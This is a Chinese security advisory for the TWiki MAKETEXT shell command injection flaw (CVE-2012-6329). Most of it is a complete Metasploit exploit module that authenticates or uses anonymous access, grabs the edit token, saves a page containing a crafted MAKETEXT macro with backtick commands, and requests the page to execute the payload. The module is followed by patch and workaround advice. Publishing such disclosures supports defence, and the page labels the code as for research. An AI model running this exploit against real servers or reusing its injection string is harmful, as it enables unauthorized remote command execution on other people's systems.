TWiki.pm MAKETEXT宏任意shell命令注入漏洞

发布日期：2012-12-14
更新日期：2012-12-24受影响系统：
TWiki TWiki <= 5.1
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 56950
CVE（CAN） ID: CVE-2012-6329,CVE-2012-6330

TWiki是一款灵活易用、功能强大的企业协作平台和知识管理系统。

TWiki Locale::Maketext CPAN模块内存在安全漏洞，MAKETEXT宏内的值没有被正确过滤直接传入Perl脚本中的eval函数中执行，可允许远程攻击者通过Perl脚本backtick （""）操作符执行任意shell命令。

<*来源：George Clark

链接：http://www.exploit-db.com/exploits/23579/
http://www.osvdb.org/show/osvdb/88460
http://secunia.com/advisories/51548/
http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
## require "msf/core" class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize（info = {}）
super（update_info（info,
"Name" => "TWiki MAKETEXT Remote Command Execution",
"Description" => %q{
This module exploits a vulnerability in the MAKETEXT Twiki variable. By using a
specially crafted MAKETEXT, a malicious user can execute shell commands since user
input is passed to the Perl "eval" command without first being sanitized. The
problem is caused by an underlying security issue in the CPAN:Locale::Maketext
module. This works in TWiki sites that have user interface localization enabled
（UserInterfaceInternationalisation variable set）. If USERNAME and PASSWORD aren"t provided, anonymous access will be tried. Also,
if the "TwikiPage" option isn"t provided, the module will try to create a random
page on the SandBox space. The modules has been tested successfully on
TWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine.
},
"Author" =>
[
"George Clark", # original discovery
"juan vazquez" # Metasploit module
],
"License" => MSF_LICENSE,
"References" =>
[
[ "CVE", "2012-6329" ],
[ "OSVDB", "88460" ],
[ "BID", "56950" ],
[ "URL", "http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329" ]
],
"Privileged" => false, # web server context
"Payload" =>
{
"DisableNops" => true,
"Space" => 1024,
"Compat" =>
{
"PayloadType" => "cmd",
"RequiredCmd" => "generic ruby python bash telnet"
}
},
"Platform" => [ "unix" ],
"Arch" => ARCH_CMD,
"Targets" => [[ "Automatic", { }]],
"DisclosureDate" => "Dec 15 2012",
"DefaultTarget" => 0）） register_options（
[
OptString.new（"TARGETURI", [ true, "TWiki base path", "/" ]）,
OptString.new（"TwikiPage", [ false, "TWiki Page with edit permissions to inject the payload, by default random Page on Sandbox （Ex: /Sandbox/MsfTest）" ]）,
OptString.new（"USERNAME", [ false, "The user to authenticate as （anonymous if username not provided）"]）,
OptString.new（"PASSWORD", [ false, "The password to authenticate with （anonymous if password not provided）" ]）
], self.class）
end def do_login（username, password）
res = send_request_cgi（{
"method" => "POST",
"uri" => "#{@base}do/login",
"vars_post" =>
{
"username" => username,
"password" => password
}
}） if not res or res.code ！= 302 or res.headers["Set-Cookie"] ！~ /TWIKISID=（[0-9a-f]*）/
return nil
end session = $1
return session
end def inject_code（session, code） vprint_status（"Retrieving the crypttoken..."） res = send_request_cgi（{
"uri" => "#{@base}do/edit#{@page}",
"cookie" => "TWIKISID=#{session}",
"vars_get" =>
{
"nowysiwyg" => "1"
}
}） if not res or res.code ！= 200 or res.body ！~ /name="crypttoken" value="（[0-9a-f]*）"/
vprint_error（"Error retrieving the crypttoken"）
return nil
end crypttoken = $1
vprint_good（"crypttoken found: #{crypttoken}"） if session.empty？
if res.headers["Set-Cookie"] =~ /TWIKISID=（[0-9a-f]*）/
session = $1
else
vprint_error（"Error using anonymous access"）
return nil
end
end vprint_status（"Injecting the payload..."） res = send_request_cgi（{
"method" => "POST",
"uri" => "#{@base}do/save#{@page}",
"cookie" => "TWIKISID=#{session}",
"vars_post" =>
{
"crypttoken" => crypttoken,
"text" => "#{rand_text_alpha（3 + rand（3））} %MAKETEXT{"#{rand_text_alpha（3 + rand（3））} [_1] #{rand_text_alpha（3 + rand（3））}\\"}; `#{code}`; { #" args="#{rand_text_alpha（3 + rand（3））}"}%"
}
}） if not res or res.code ！= 302 or res.headers["Location"] =~ /oops/ or res.headers["Location"] ！~ /#{@page}/
print_warning（"Error injecting the payload"）
print_status "#{res.code} #{res.body} #{res.headers["Location"]}"
return nil
end location = URI（res.headers["Location"]）.path
print_good（"Payload injected on #{location}"） return location
end def check
@base = target_uri.path
@base << "/" if @base[-1, 1] ！= "/" res = send_request_cgi（{
"uri" => "#{@base}do/view/TWiki/WebHome"
}） if not res or res.code ！= 200
return Exploit::CheckCode::Unknown
end if res.body =~ /This site is running TWiki version.*TWiki-（d.d.d）/
version = $1
print_status（"Version found: #{version}"）
if version < "5.1.3"
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end return Exploit::CheckCode::Detected
end
def exploit # Init variables
@page = "" if datastore["TwikiPage"] and not datastore["TwikiPage"].empty？
@page << "/" if datastore["TwikiPage"][0] ！= "/"
@page << datastore["TwikiPage"]
else
@page << "/Sandbox/#{rand_text_alpha_lower（3）.capitalize}#{rand_text_alpha_lower（3）.capitalize}"
end @base = target_uri.path
@base << "/" if @base[-1, 1] ！= "/" # Login if needed
if （datastore["USERNAME"] and
not datastore["USERNAME"].empty？ and
datastore["PASSWORD"] and
not datastore["PASSWORD"].empty？）
print_status（"Trying login to get session ID..."）
session = do_login（datastore["USERNAME"], datastore["PASSWORD"]）
else
print_status（"Using anonymous access..."）
session = ""
end if not session
fail_with（Exploit::Failure::Unknown, "Error getting a session ID"）
end # Inject payload
print_status（"Trying to inject the payload on #{@page}..."）
res = inject_code（session, payload.encoded）
if not res
fail_with（Exploit::Failure::Unknown, "Error injecting the payload"）
end # Execute payload
print_status（"Executing the payload through #{res}..."）
res = send_request_cgi（{
"uri" => res,
"cookie" => "TWIKISID=#{session}"
}）
if not res or res.code ！= 200 or res.body ！~ /HASH/
fail_with（Exploit::Failure::Unknown, "Error executing the payload"）
end print_good（"Exploitation was successful"） end end =begin * Trigger: %MAKETEXT{"test [_1] secondtest\"}; `touch /tmp/msf.txt`; { #" args="msf"}% =end建议：
--------------------------------------------------------------------------------
临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 通过将flag {UserInterfaceInternationalisation} 设置为0禁用本地化操作。

厂商补丁：

TWiki
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://twiki.org/cgi-bin/view/Codev/TWikiRelease05x01x03Computer Associates IdentityMinder 任意命令执行漏洞（CVE-2012-6298）Computer Associates IdentityMinder 权限提升漏洞（CVE-2012-6299）相关资讯 TWiki TWiki安全漏洞

TWiki 6.0.2 发布下载，Perl 开发（01月16日）
Linux下TWiki的安装配置过程（10/24/2013 10:05:50）
企业 Wiki 系统 TWiki （10/24/2013 09:51:13）

TWiki中安装LDAP出现报错问题解决（12/23/2014 09:11:52）
Ubuntu上TWiki安装和使用心得（10/24/2013 09:57:25）
TWiki 6.0 发布，Perl 开发的企业（10/24/2013 09:43:33）

本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任